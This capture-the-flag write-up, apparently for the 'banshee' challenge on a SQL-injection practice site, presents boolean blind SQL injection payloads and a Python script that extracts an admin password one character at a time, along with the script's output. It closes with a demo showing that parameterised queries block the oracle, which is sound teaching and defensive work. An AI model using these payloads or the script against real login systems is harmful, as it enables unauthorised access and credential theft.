
banshee


We are given the following SQLite query.

SELECT id FROM member WHERE id='admin' AND pw='{$_GET[pw]}'

To solve this challenge we have to perform blind SQL injection, using the login result as a true/false oracle.

 

Blind SQL injection

Extracting the password length

If we provide the following URI parameter:

?pw=' OR id='admin' AND length(pw)=[length] -- -

The resultant query becomes:

SELECT id FROM member WHERE id='admin' AND pw='' OR id='admin' AND length(pw)=[length] -- -'

When the length of pw for id='admin' equals the [length] we supply, the query evaluates to true and the login success! message is printed. We can brute force the length and use that message as the indicator of a correct guess.

Leaking the password

If we provide the following URI parameter:

?pw=' OR id='admin' AND substr(pw, [index], 1)='[char]' -- -

The resultant query becomes:

SELECT id FROM member WHERE id='admin' AND pw='' OR id='admin' AND substr(pw, [index], 1)='[char]' -- -'

If, for id='admin', the character of pw at position [index] matches the [char] we supply, the query evaluates to true and the login success! message is printed. We can brute force the password one character at a time by varying [index] and [char].

Script

banshee_script.py
import requests
import urllib.parse
import string

# Session cookie and challenge URL used for the write-up
cookies = {'PHPSESSID': 'p4hrm6i519s3gb9g95dqsmqk8v'}
url = "https://los.rubiya.kr/chall/banshee_ece938c70ea2419a093bb0be9f01a7b1.php"
password_length = 0

# Step 1: brute force the password length, using the "login success!"
# message as the boolean oracle
for x in range(0, 10):
    payload = f"' OR id='admin' AND length(pw)={x} -- -"
    encoded_payload = urllib.parse.quote_plus(payload)
    full_url = f"{url}?pw={encoded_payload}"

    response = requests.get(full_url, cookies=cookies)

    if "login success!" in response.text:
        password_length = x
        break

print()
print(f"[!] Payload: ?pw={payload}")
print(f"[!] Payload (URL encoded): ?pw={encoded_payload}")
print(f"[!] Password length: {password_length}")

# Step 2: recover the password one character at a time with substr()
password = ""
searchspace = string.digits + string.ascii_letters

for index in range(1, password_length + 1):
    for char in searchspace:
        payload = f"' OR id='admin' AND substr(pw, {index}, 1)='{char}' -- -"
        encoded_payload = urllib.parse.quote_plus(payload)
        full_url = f"{url}?pw={encoded_payload}"

        response = requests.get(full_url, cookies=cookies)

        if "login success!" in response.text:
            password += char
            print()
            print(f"[+] Payload: ?pw={payload}")
            print(f"[+] Payload (URL encoded): ?pw={encoded_payload}")
            print(f"[+] Character at index {index}: {char}")
            break

print()
print(f"[!] Extracted password: {password}")
print(f"[!] Final payload: ?pw={password}")
$ python .\banshee_script.py     

[!] Payload: ?pw=' OR id='admin' AND length(pw)=8 -- -
[!] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+length%28pw%29%3D8+--+-
[!] Password length: 8

[+] Payload: ?pw=' OR id='admin' AND substr(pw, 1, 1)='0' -- -
[+] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+substr%28pw%2C+1%2C+1%29%3D%270%27+--+-
[+] Character at index 1: 0

[+] Payload: ?pw=' OR id='admin' AND substr(pw, 2, 1)='3' -- -
[+] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+substr%28pw%2C+2%2C+1%29%3D%273%27+--+-
[+] Character at index 2: 3

[+] Payload: ?pw=' OR id='admin' AND substr(pw, 3, 1)='1' -- -
[+] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+substr%28pw%2C+3%2C+1%29%3D%271%27+--+-
[+] Character at index 3: 1

[+] Payload: ?pw=' OR id='admin' AND substr(pw, 4, 1)='3' -- -
[+] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+substr%28pw%2C+4%2C+1%29%3D%273%27+--+-
[+] Character at index 4: 3

[+] Payload: ?pw=' OR id='admin' AND substr(pw, 5, 1)='0' -- -
[+] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+substr%28pw%2C+5%2C+1%29%3D%270%27+--+-
[+] Character at index 5: 0

[+] Payload: ?pw=' OR id='admin' AND substr(pw, 6, 1)='9' -- -
[+] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+substr%28pw%2C+6%2C+1%29%3D%279%27+--+-
[+] Character at index 6: 9

[+] Payload: ?pw=' OR id='admin' AND substr(pw, 7, 1)='1' -- -
[+] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+substr%28pw%2C+7%2C+1%29%3D%271%27+--+-
[+] Character at index 7: 1

[+] Payload: ?pw=' OR id='admin' AND substr(pw, 8, 1)='b' -- -
[+] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+substr%28pw%2C+8%2C+1%29%3D%27b%27+--+-
[+] Character at index 8: b

[!] Extracted password: 0313091b
[!] Final payload: ?pw=0313091b

 

If we provide the following URI parameter:

?pw=0313091b

The resultant query becomes:

SELECT id FROM member WHERE id='admin' AND pw='0313091b'
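To see why the oracle works and what closes it, here is an added example that is not part of the original write-up: an in-memory SQLite stand-in for the member table, the challenge's string-spliced query beside a parameterised version, and the write-up's own probes sent through both. The table contents and all function names are constructed for this demo.

```python
import sqlite3

# Constructed sample data: an in-memory stand-in for the challenge's member
# table, seeded with the password the write-up recovered.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member (id TEXT, pw TEXT)")
    conn.execute("INSERT INTO member VALUES ('admin', '0313091b')")
    return conn

def login_vulnerable(conn, pw):
    # Same shape as the challenge query: pw is spliced into the SQL text,
    # so quotes and comment markers inside it become SQL syntax.
    sql = f"SELECT id FROM member WHERE id='admin' AND pw='{pw}'"
    return conn.execute(sql).fetchone() is not None

def login_hardened(conn, pw):
    # Hardened form: pw is bound as a parameter, so it is only ever compared
    # as a string value and cannot alter the WHERE clause.
    sql = "SELECT id FROM member WHERE id='admin' AND pw=?"
    return conn.execute(sql, (pw,)).fetchone() is not None

def length_probe(login, conn, length):
    # The write-up's length oracle, sent through the given login function.
    return login(conn, f"' OR id='admin' AND length(pw)={length} -- -")

def char_probe(login, conn, index, char):
    # The write-up's per-character oracle, sent through the given login function.
    return login(conn, f"' OR id='admin' AND substr(pw, {index}, 1)='{char}' -- -")

def oracle_leaks(login, conn):
    # True when a correct and a wrong guess produce different results,
    # i.e. the login function still acts as a boolean oracle.
    return char_probe(login, conn, 1, "0") != char_probe(login, conn, 1, "x")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable query leaks:", oracle_leaks(login_vulnerable, db))  # True
    print("hardened query leaks:  ", oracle_leaks(login_hardened, db))    # False
```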
